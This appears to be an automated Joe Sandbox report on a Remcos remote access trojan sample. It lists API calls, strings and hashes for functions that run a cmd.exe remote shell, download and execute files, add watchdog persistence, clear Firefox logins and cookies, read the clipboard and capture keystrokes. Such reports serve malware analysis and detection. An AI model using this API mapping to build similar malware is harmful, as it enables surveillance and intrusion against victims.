                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                          • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                          • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                          • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                          Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 477 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                          APIs
                                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                          • GetLastError.KERNEL32 ref: 0040BEF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID: (CG
                                                          • API String ID: 1925916568-4210230975
                                                          • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                          • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                          • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                          • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                          Function 00447174 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 488 447174-44719e 489 4471a0-4471a2 488->489 490 447209 488->490 491 4471a4-4471a6 489->491 492 4471a8-4471ae 489->492 493 44720b-44720f 490->493 491->493 494 4471b0-4471b2 call 447210 492->494 495 4471ca 492->495 500 4471b7-4471ba 494->500 496 4471cc-4471ce 495->496 498 4471d0-4471de GetProcAddress 496->498 499 4471f9-447207 496->499 501 4471e0-4471e9 call 4333a7 498->501 502 4471f3 498->502 499->490 503 4471bc-4471c2 500->503 504 4471eb-4471f1 500->504 501->491 502->499 503->494 506 4471c4 503->506 504->496 506->495
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004471D4
                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                          • String ID:
                                                          • API String ID: 2279764990-0
                                                          • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                          • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                          • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                          • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9
                                                          Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 508 43360d-433610 509 43361f-433622 call 43a88c 508->509 511 433627-43362a 509->511 512 433612-43361d call 442200 511->512 513 43362c-43362d 511->513 512->509 516 43362e-433632 512->516 517 433638-433dec call 433d58 call 437bd7 516->517 518 433ded-433e09 call 433d8b call 437bd7 516->518 517->518
                                                          APIs
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                            • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3476068407-0
                                                          • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                          • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                          • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                          • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                          Function 0044EEB5 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 528 44eeb5-44eec2 call 448706 530 44eec7-44eed2 528->530 531 44eed4-44eed6 530->531 532 44eed8-44eee0 530->532 533 44ef20-44ef2e call 446ac5 531->533 532->533 534 44eee2-44eee6 532->534 535 44eee8-44ef1a call 44772e 534->535 540 44ef1c-44ef1f 535->540 540->533
                                                          APIs
                                                            • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                          • _free.LIBCMT ref: 0044EF21
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                          • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                          • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                          • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778
                                                          Function 00448706 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 541 448706-448711 542 448713-44871d 541->542 543 44871f-448725 541->543 542->543 544 448753-44875e call 445354 542->544 545 448727-448728 543->545 546 44873e-44874f RtlAllocateHeap 543->546 551 448760-448762 544->551 545->546 547 448751 546->547 548 44872a-448731 call 4447c5 546->548 547->551 548->544 554 448733-44873c call 442200 548->554 554->544 554->546
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                          • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                          • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                          • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                          Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 557 446aff-446b0b 558 446b3d-446b48 call 445354 557->558 559 446b0d-446b0f 557->559 566 446b4a-446b4c 558->566 561 446b11-446b12 559->561 562 446b28-446b39 RtlAllocateHeap 559->562 561->562 563 446b14-446b1b call 4447c5 562->563 564 446b3b 562->564 563->558 569 446b1d-446b26 call 442200 563->569 564->566 569->558 569->562
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                          • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                          • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                          • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF

                                                          Non-executed Functions

                                                          Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                            • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                            • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                            • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                            • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                            • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                            • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                          • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                            • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                            • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                            • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                          • Sleep.KERNEL32(000007D0), ref: 00407976
                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                            • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                          • API String ID: 2918587301-599666313
                                                          • Opcode ID: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                          • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                          • Opcode Fuzzy Hash: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                          • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                          Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040508E
                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • __Init_thread_footer.LIBCMT ref: 004050CB
                                                          • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                          • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                          • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                          • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                          • CloseHandle.KERNEL32 ref: 004053CD
                                                          • CloseHandle.KERNEL32 ref: 004053D5
                                                          • CloseHandle.KERNEL32 ref: 004053E7
                                                          • CloseHandle.KERNEL32 ref: 004053EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                          • API String ID: 3815868655-81343324
                                                          • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                          • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                          • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                          • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                          Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                          • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                            • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                            • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                            • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                          • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                          • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                          • API String ID: 65172268-860466531
                                                          • Opcode ID: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                          • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                          • Opcode Fuzzy Hash: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                          • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                          Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                          • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                          • FindClose.KERNEL32(00000000), ref: 0040B517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                          • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                          • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                          • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                          Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$File$FirstNext
                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 3527384056-432212279
                                                          • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                          • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                          • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                          • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                          Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                          • API String ID: 726551946-3025026198
                                                          • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                          • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                          • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                          • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                          Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 004159C7
                                                          • EmptyClipboard.USER32 ref: 004159D5
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                          • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                          • CloseClipboard.USER32 ref: 00415A5A
                                                          • OpenClipboard.USER32 ref: 00415A61
                                                          • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                          • CloseClipboard.USER32 ref: 00415A89
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID:
                                                          • API String ID: 3520204547-0
                                                          • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                          • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                          • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                          • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                          Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7
                                                          • API String ID: 0-3177665633
                                                          • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                          • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                          • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                          • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                          Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00409B3F
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                          • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                          • GetKeyState.USER32(00000010), ref: 00409B5C
                                                          • GetKeyboardState.USER32(?), ref: 00409B67
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                          Strings
                                                          Memory Dump Source
